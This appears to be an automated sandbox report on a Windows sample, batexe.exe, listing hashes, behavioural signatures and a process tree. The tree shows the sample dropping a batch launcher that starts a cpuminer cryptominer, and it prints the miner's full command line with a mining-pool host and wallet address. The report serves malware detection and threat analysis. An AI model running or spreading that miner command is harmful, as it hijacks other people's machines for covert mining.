Analysis
-
max time kernel
293s -
max time network
297s -
platform
windows10-1703_x64 -
resource
win10-20231220-ja -
resource tags
arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
12/02/2024, 00:26
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231220-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 600 b2e.exe 2636 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2636 cpuminer-sse2.exe 2636 cpuminer-sse2.exe 2636 cpuminer-sse2.exe 2636 cpuminer-sse2.exe 2636 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4496-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4496 wrote to memory of 600 4496 batexe.exe 75 PID 4496 wrote to memory of 600 4496 batexe.exe 75 PID 4496 wrote to memory of 600 4496 batexe.exe 75 PID 600 wrote to memory of 3080 600 b2e.exe 76 PID 600 wrote to memory of 3080 600 b2e.exe 76 PID 600 wrote to memory of 3080 600 b2e.exe 76 PID 3080 wrote to memory of 2636 3080 cmd.exe 79 PID 3080 wrote to memory of 2636 3080 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\9105.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9105.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9105.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\92DA.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2636
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD5006e89d943e1efd085ebfab1d53acaa7
SHA1c4bd8cbba413f61b5e77ce182897aada33591a0c
SHA256de042f460aa86d7545d5929eb1a93267c7c6125b61bfb968d5bbf94e2e936315
SHA512a899acda7573b0c224b359d3a9b66bf6225997853928622aabc582c1d0263e52a170bef315e4c95477be659dc37cda2cdd8ed33fec926b0c2438dbe6ce99d64e
-
Filesize
2.9MB
MD5391c7147bcf6b97621ef8feb7f3697ec
SHA124d2810f6f3bb56cfa33be91d92bfe4226e69a96
SHA256f659b55b1abe6bf733311b8b6a8d3ca239004750ede606938cc83c23e870d2cb
SHA5127777b7bf11c4a723e4946fcd62680e08263a6d995a3ffd1255caa9363b95f6459f58c9ae21a39b54e88db464bd976d42ce216b5cade43d3dcc52d0605f79a12a
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
622KB
MD5ae56fe8bee56c3ae85765f69fea5a50e
SHA193b554d02925208e81e332f85790e0db854b0a8f
SHA256fe687b5584200d444f6ae770a49165bd453d5e8d4a0402ae47fe78df4588ddd8
SHA51291b1bc9b33436da7a2578e85ef10d1284be655d5ccc633cfad6d583e3c99da8db3a6dad80d0fcdc6e6b50112cd8faefa2b19abf80256641e4ce4efaede3c2118
-
Filesize
497KB
MD5e419356edaca2b45a475b9f3205fbd7f
SHA1eadd6e7c71e03bd012282c5c9d567d7579b19fd9
SHA25635eaa1399bbd5bf6eb176f121f8397ffee792d0917f86d4964cffdf189c95003
SHA51265bd46e1e51ef961fe9e08167c0fb5949619705d1023f984389edf5599f5f235eaec5816bf29fc03fa55551e5f3a91deb85db2a7befc6bcc9736bb7df5387f71
-
Filesize
419KB
MD5b79138b843944f9a0fc1b56feec75b96
SHA14ab2989e80b0753d333c9c7d2b184e978036ce33
SHA2567b85a32cdbebd1ccc6f86b1851960b9813624fd3dd4edb11e299a13d94712475
SHA5127e9d1bb178f55431831e59810dd6b8157eccf6ac615ea1d255ad52e702ceb0c02b5fe8e4e99e0770ab12c7a5d4912cdac0008513c137d189a013c8f529175a89
-
Filesize
902KB
MD5a562fc462d32282bd5a2500908ec7102
SHA13ecf086e12c7846ad093c660220215aff7f8aaa1
SHA256e0625997c1021a0c56cd544905bf0fa6858df9ba524c6d4128df0f0d04891907
SHA51213ae09f383cd6f32a59f1445edf0e6d43906551fd690f1e8be429cc074c56bfc350c6a54a3c923cb38008ea2447753aad58234c2b46e51e8bd6cd329056d3389
-
Filesize
932KB
MD58a944a6fd79468d8d045495f24e5fe25
SHA139269bad1cd1adb2c0d105e27832a45d350aaf5b
SHA256b2cf89578d7aa050ccbcbcc2ceac84089bd746e22a729637056f73cd56ee138c
SHA51248fff40f24b06828ed44c304446730d83f1efda13c845fef8f31be663feea18f5d7512c06820e9788574e29545cbbfa13d54ebc58ab1bf00e579387f2dab9242
-
Filesize
599KB
MD5d940a29c293278fa81b7af7567671c52
SHA1c7bb6fde947939826f6db82db184b8b5fc274afd
SHA256ccfe69d3f96f732acde17dce042d7a67047d5f84ad59fae6ab4d4ea779081b52
SHA512d3fd012c4bc43cc4282f331063094eabf9ca64b78ae86a24851a472cea03b5a7b95dff320092421dba33aeb7e12057197221b9356cf2c2fd815948c7192eaf57
-
Filesize
594KB
MD52419a28d784c796aa57e65282f0fd365
SHA1ff77ee7545e7cc3f7986ad9d692a6f1b87f50911
SHA25642b5e50def9112d41c812ec6536b8f09c2c3a8cbc77ff7e92f0c6e39babc2a14
SHA51281a1622db8012e749beb4a1013a2104c977059bee9f99c5cbcb6db562e82445d951677f6eee6dad5e7c736a965ebe0962f0c013e98c1a15574d8f10cdc97ffa9
-
Filesize
710KB
MD509661dbdf2188d031366aba7ef5267f1
SHA1bd67465f976e4d0208b23c43ba8cbd72fe210220
SHA256086df9abc0e6eeeaad1471d61890fba4c8529a2b07560d576349d9ad3c956568
SHA512884a24589a53ab7d87637bcd4e45330dd049377417834f26d752315758ce6203d0275f5c85d894c51b9de36384f154bf3d44398b3bf91d50c9caeaef049940ea
-
Filesize
601KB
MD5fb8a92d5a9949123d897d048af5998b1
SHA15d60d2b059cd12545879be60345eb0b937fe686b
SHA256c272c16d5cbb0e4d39626eb83f3509dd69f9130cfcc9ec182f0dd5d188585f30
SHA512bff4173bef4c199604bb0126201bda25c08aadea1a0addf06f4b3c900cb662400d213d7683afb5ee8884b3a98199da47bceb8a9e47ddccaffdc32fb928140068
-
Filesize
483KB
MD520ef33142b29254c5595d62f4f551db8
SHA16bdb44a53559a932494f58aa5013ef7d40123a42
SHA256b708640f41381fe535a3e151bce6612474048cab38be0b8645fe176447be691b
SHA512f1cf23be9bc1b97aff34a075f76cc5dc56f11f11c7281d80edbf42fb8603151edf34ee9c43f34699bbe0cfba46c084ff1cd8286ee83ca7b806bbffa8ce2f8fdc
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770